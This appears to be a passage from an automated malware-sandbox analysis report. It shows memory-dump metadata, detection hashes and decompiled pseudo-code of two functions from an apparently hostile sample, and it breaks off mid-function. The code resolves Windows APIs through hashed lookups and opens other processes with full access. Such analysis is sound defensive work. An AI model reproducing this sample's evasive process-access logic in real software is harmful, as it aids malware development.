                                                                                                        • Source File: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.599564255.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599779565.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599845598.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599864111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: J}*
                                                                                                        • API String ID: 0-3566034359
                                                                                                        • Opcode ID: 3de6d7cef0cdc59b9ad438c61b36141e383f1e79743cdaae7623d9e163d39288
                                                                                                        • Instruction ID: 2d0b7547684741a8baa3a0fbe14fb8abeb41ea5cf6ce277a40cb2789471ff98d
                                                                                                        • Opcode Fuzzy Hash: 3de6d7cef0cdc59b9ad438c61b36141e383f1e79743cdaae7623d9e163d39288
                                                                                                        • Instruction Fuzzy Hash: 6B22D134708341AAE760DB20C851BAF77E9EF85384F51892DF8C99F196DBB0E885C752
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000A52C, Relevance: 1.8, Strings: 1, Instructions: 537COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E1000A52C(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E1000B69C(_t439 + 0x24, _t392, 0x7fffffff);
					if(E1000F4F4(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E1000F678(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E1001223C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E1000F678(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E1000F5A8(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E1000F5A8(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x1001b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E1001303C(0xfe338407, 0x8a79536f);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E1000B608(_t439 + 0x34);
											E1000B608(_t439 + 8);
											goto L65;
										}
										L62:
										E1000B608(_t439 + 0x34);
										E1000B608(_t439 + 8);
										goto L63;
									}
									_t392 = E1000F4E0(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E1000CAD0(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E1000C2C4(_t324);
									if(__eflags != 0) {
										break;
									}
									E1000F84C(_t439 + 0x14, E1000F4F0(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E1000F4E0(_t439 + 0x14, E1000F4F0(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E1001303C(0xfe338407, 0xa8c8a645);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E1000F84C(_t439 + 0x40, E1000F4F0(_t439 + 0x3c) + 4);
											 *(E1000F4E0(_t439 + 0x40, E1000F4F0(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E1000CD68(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E1000F4E0(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E1000AC8C(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E1000CD68(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E100138C8( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E1000F4F0( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E1000F4F0( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t413);
										E100138C8(_t243,  *((intOrPtr*)(_t439 + 0x98)), E1000F4F0( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 4);
								 *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E1000F4E0(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E1001303C(0x10154545, 0xc2a75cb8);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E1000F4E0(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E1000F4E0(_t439 + 0x28,  *(_t439 + 0x70));
										E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 4);
										 *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E1000F4F0( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E1000F4F0( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t420);
										E100138C8( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E1000F4F0( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E1001303C(0xfe338407, 0x77fa1d17);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t422);
										E100138C8( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E1000F4E0(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}













































                                                                                                        0x1000a536
                                                                                                        0x1000a538
                                                                                                        0x1000a543
                                                                                                        0x1000a549
                                                                                                        0x1000a54d
                                                                                                        0x1000a552
                                                                                                        0x1000a558
                                                                                                        0x1000a568
                                                                                                        0x00000000
                                                                                                        0x1000a56a
                                                                                                        0x1000a56a
                                                                                                        0x1000a575
                                                                                                        0x1000a575
                                                                                                        0x1000aaf3
                                                                                                        0x1000aaf5
                                                                                                        0x1000aaf6
                                                                                                        0x1000ab35
                                                                                                        0x1000ab39
                                                                                                        0x1000ab47
                                                                                                        0x1000ab55
                                                                                                        0x1000ab55
                                                                                                        0x1000ab40
                                                                                                        0x1000ab5b
                                                                                                        0x1000ab60
                                                                                                        0x00000000
                                                                                                        0x1000ab60
                                                                                                        0x1000ab44
                                                                                                        0x1000ab45
                                                                                                        0x00000000
                                                                                                        0x1000a57f
                                                                                                        0x1000a57f
                                                                                                        0x1000a583
                                                                                                        0x1000a68a
                                                                                                        0x1000a68a
                                                                                                        0x1000a68f
                                                                                                        0x1000a7a0
                                                                                                        0x1000a7a4
                                                                                                        0x1000a7a9
                                                                                                        0x1000a7ad
                                                                                                        0x1000a8d7
                                                                                                        0x1000a8d9
                                                                                                        0x1000a8dd
                                                                                                        0x1000a8e6
                                                                                                        0x1000a8ef
                                                                                                        0x1000a8f3
                                                                                                        0x1000a8fc
                                                                                                        0x1000a903
                                                                                                        0x1000a904
                                                                                                        0x1000a908
                                                                                                        0x1000a90c
                                                                                                        0x1000a910
                                                                                                        0x1000a912
                                                                                                        0x1000aa7c
                                                                                                        0x1000aa7c
                                                                                                        0x1000aa84
                                                                                                        0x1000aa9c
                                                                                                        0x1000aa9e
                                                                                                        0x1000aaa0
                                                                                                        0x1000aada
                                                                                                        0x1000aada
                                                                                                        0x1000aadc
                                                                                                        0x1000aadc
                                                                                                        0x1000aadf
                                                                                                        0x1000aafa
                                                                                                        0x1000ab0e
                                                                                                        0x1000ab11
                                                                                                        0x1000ab16
                                                                                                        0x1000ab21
                                                                                                        0x1000ab22
                                                                                                        0x1000ab25
                                                                                                        0x1000ab27
                                                                                                        0x1000ab30
                                                                                                        0x00000000
                                                                                                        0x1000ab30
                                                                                                        0x1000aae1
                                                                                                        0x1000aae5
                                                                                                        0x1000aaee
                                                                                                        0x00000000
                                                                                                        0x1000aaee
                                                                                                        0x1000aab1
                                                                                                        0x1000aac1
                                                                                                        0x1000aac5
                                                                                                        0x1000aac5
                                                                                                        0x1000aac8
                                                                                                        0x1000aacb
                                                                                                        0x1000aace
                                                                                                        0x1000aad4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000aad6
                                                                                                        0x1000a91a
                                                                                                        0x1000a91a
                                                                                                        0x1000a91c
                                                                                                        0x1000a920
                                                                                                        0x1000a925
                                                                                                        0x1000a927
                                                                                                        0x1000a92b
                                                                                                        0x1000a92e
                                                                                                        0x1000a936
                                                                                                        0x1000a938
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a94f
                                                                                                        0x1000a96a
                                                                                                        0x1000a96c
                                                                                                        0x1000a97f
                                                                                                        0x1000a981
                                                                                                        0x1000a983
                                                                                                        0x1000a99e
                                                                                                        0x1000a99e
                                                                                                        0x1000a9a2
                                                                                                        0x1000a9a4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a9a6
                                                                                                        0x1000a9a9
                                                                                                        0x1000a9ca
                                                                                                        0x1000a9e9
                                                                                                        0x1000a9ef
                                                                                                        0x1000a9f2
                                                                                                        0x1000a9f7
                                                                                                        0x1000a9f8
                                                                                                        0x1000a9fc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000aa04
                                                                                                        0x1000aa04
                                                                                                        0x1000aa06
                                                                                                        0x1000aa12
                                                                                                        0x1000aa1e
                                                                                                        0x1000aa28
                                                                                                        0x1000aa2b
                                                                                                        0x1000aa2e
                                                                                                        0x1000aa32
                                                                                                        0x1000aa39
                                                                                                        0x1000aa3d
                                                                                                        0x1000aa41
                                                                                                        0x1000aa42
                                                                                                        0x1000aa46
                                                                                                        0x1000aa4b
                                                                                                        0x1000aa50
                                                                                                        0x1000aa54
                                                                                                        0x1000aa58
                                                                                                        0x1000aa5e
                                                                                                        0x1000aa64
                                                                                                        0x1000aa6a
                                                                                                        0x1000aa70
                                                                                                        0x1000aa75
                                                                                                        0x1000aa76
                                                                                                        0x1000aa76
                                                                                                        0x00000000
                                                                                                        0x1000aa06
                                                                                                        0x00000000
                                                                                                        0x1000a9a9
                                                                                                        0x1000a987
                                                                                                        0x1000a998
                                                                                                        0x1000a99a
                                                                                                        0x1000a99c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a99c
                                                                                                        0x1000a9af
                                                                                                        0x00000000
                                                                                                        0x1000a9af
                                                                                                        0x1000a7b3
                                                                                                        0x1000a7b6
                                                                                                        0x1000a7b8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a7c0
                                                                                                        0x1000a7c0
                                                                                                        0x1000a7c2
                                                                                                        0x1000a7c2
                                                                                                        0x1000a7d3
                                                                                                        0x1000a7d5
                                                                                                        0x1000a7d8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a8ce
                                                                                                        0x1000a8cf
                                                                                                        0x1000a8d1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a8d1
                                                                                                        0x1000a7de
                                                                                                        0x1000a7e1
                                                                                                        0x1000a7eb
                                                                                                        0x1000a7f0
                                                                                                        0x1000a7f2
                                                                                                        0x1000a7f8
                                                                                                        0x1000a7ff
                                                                                                        0x1000a803
                                                                                                        0x1000a808
                                                                                                        0x1000a80c
                                                                                                        0x1000ac47
                                                                                                        0x1000ac5b
                                                                                                        0x1000ac7e
                                                                                                        0x1000ac83
                                                                                                        0x1000ac83
                                                                                                        0x1000a823
                                                                                                        0x1000a828
                                                                                                        0x1000a828
                                                                                                        0x1000a828
                                                                                                        0x1000a828
                                                                                                        0x1000a82e
                                                                                                        0x1000a833
                                                                                                        0x1000a835
                                                                                                        0x1000a83a
                                                                                                        0x1000a841
                                                                                                        0x1000a846
                                                                                                        0x1000a848
                                                                                                        0x1000ac05
                                                                                                        0x1000ac16
                                                                                                        0x1000ac30
                                                                                                        0x1000ac35
                                                                                                        0x1000ac35
                                                                                                        0x1000a85e
                                                                                                        0x1000a863
                                                                                                        0x1000a863
                                                                                                        0x1000a863
                                                                                                        0x1000a863
                                                                                                        0x1000a877
                                                                                                        0x1000a895
                                                                                                        0x1000a89a
                                                                                                        0x1000a8aa
                                                                                                        0x1000a8c7
                                                                                                        0x1000a8c9
                                                                                                        0x1000a8c9
                                                                                                        0x00000000
                                                                                                        0x1000a7e1
                                                                                                        0x1000a697
                                                                                                        0x1000a697
                                                                                                        0x1000a699
                                                                                                        0x1000a6a0
                                                                                                        0x1000a6ae
                                                                                                        0x1000a6b0
                                                                                                        0x1000a6b3
                                                                                                        0x1000a6ba
                                                                                                        0x1000a6bc
                                                                                                        0x1000a6ed
                                                                                                        0x1000a6fc
                                                                                                        0x1000a6fe
                                                                                                        0x1000a700
                                                                                                        0x1000a71e
                                                                                                        0x1000a720
                                                                                                        0x1000a722
                                                                                                        0x1000a735
                                                                                                        0x1000a754
                                                                                                        0x1000a75a
                                                                                                        0x1000a75d
                                                                                                        0x1000a774
                                                                                                        0x1000a790
                                                                                                        0x1000a792
                                                                                                        0x1000a792
                                                                                                        0x1000a792
                                                                                                        0x1000a792
                                                                                                        0x1000a722
                                                                                                        0x00000000
                                                                                                        0x1000a700
                                                                                                        0x1000a6c0
                                                                                                        0x1000a6c0
                                                                                                        0x1000a6c2
                                                                                                        0x1000a6d3
                                                                                                        0x1000a6d5
                                                                                                        0x1000a6d7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a6e3
                                                                                                        0x1000a6e4
                                                                                                        0x1000a6eb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a6eb
                                                                                                        0x1000a6d9
                                                                                                        0x1000a6dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a795
                                                                                                        0x1000a795
                                                                                                        0x1000a796
                                                                                                        0x1000a796
                                                                                                        0x00000000
                                                                                                        0x1000a589
                                                                                                        0x1000a58b
                                                                                                        0x1000a58b
                                                                                                        0x1000a58d
                                                                                                        0x1000a594
                                                                                                        0x1000a5a2
                                                                                                        0x1000a5a4
                                                                                                        0x1000a5a8
                                                                                                        0x1000a5ac
                                                                                                        0x1000a5ae
                                                                                                        0x1000a5dc
                                                                                                        0x1000a5df
                                                                                                        0x1000a5e4
                                                                                                        0x1000a5e8
                                                                                                        0x1000a5ed
                                                                                                        0x1000a5f4
                                                                                                        0x1000a5f9
                                                                                                        0x1000a5fb
                                                                                                        0x1000abc2
                                                                                                        0x1000abd3
                                                                                                        0x1000abf3
                                                                                                        0x1000abf8
                                                                                                        0x1000abf8
                                                                                                        0x1000a611
                                                                                                        0x1000a616
                                                                                                        0x1000a616
                                                                                                        0x1000a616
                                                                                                        0x1000a616
                                                                                                        0x1000a628
                                                                                                        0x1000a62a
                                                                                                        0x1000a62c
                                                                                                        0x1000a63d
                                                                                                        0x1000a63d
                                                                                                        0x1000a643
                                                                                                        0x1000a648
                                                                                                        0x1000a64c
                                                                                                        0x1000a652
                                                                                                        0x1000a659
                                                                                                        0x1000a65e
                                                                                                        0x1000a660
                                                                                                        0x1000ab76
                                                                                                        0x1000ab87
                                                                                                        0x1000aba8
                                                                                                        0x1000abad
                                                                                                        0x1000abad
                                                                                                        0x1000a677
                                                                                                        0x1000a67c
                                                                                                        0x1000a67c
                                                                                                        0x1000a67c
                                                                                                        0x1000a67c
                                                                                                        0x1000a67f
                                                                                                        0x1000a67f
                                                                                                        0x00000000
                                                                                                        0x1000a67f
                                                                                                        0x1000a5b2
                                                                                                        0x1000a5b2
                                                                                                        0x1000a5b4
                                                                                                        0x1000a5c5
                                                                                                        0x1000a5c7
                                                                                                        0x1000a5c9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a5d5
                                                                                                        0x1000a5d6
                                                                                                        0x1000a5da
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a5da
                                                                                                        0x1000a5cb
                                                                                                        0x1000a5ce
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000a680
                                                                                                        0x1000a680
                                                                                                        0x1000a681
                                                                                                        0x1000a681
                                                                                                        0x00000000
                                                                                                        0x1000a58d
                                                                                                        0x1000a583

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.599564255.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599779565.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599845598.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.599864111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 36e75452c6386778a6513a02999b7e65d42d9e31c513e5d7e5861bcc0e0d1e34
                                                                                                        • Instruction ID: 00802be3918ea6aeb11fe45908ae931f8062d9273d37329102aa76dba10a21a3
                                                                                                        • Opcode Fuzzy Hash: 36e75452c6386778a6513a02999b7e65d42d9e31c513e5d7e5861bcc0e0d1e34
                                                                                                        • Instruction Fuzzy Hash: 60128C755082019FE714DF24C882A6FB7E5FFC5394F108A2DF899972AADB30AC45DB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000846C, Relevance: 1.8, Strings: 1, Instructions: 531COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E1000846C(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E1000B69C(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E1000F4F4(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
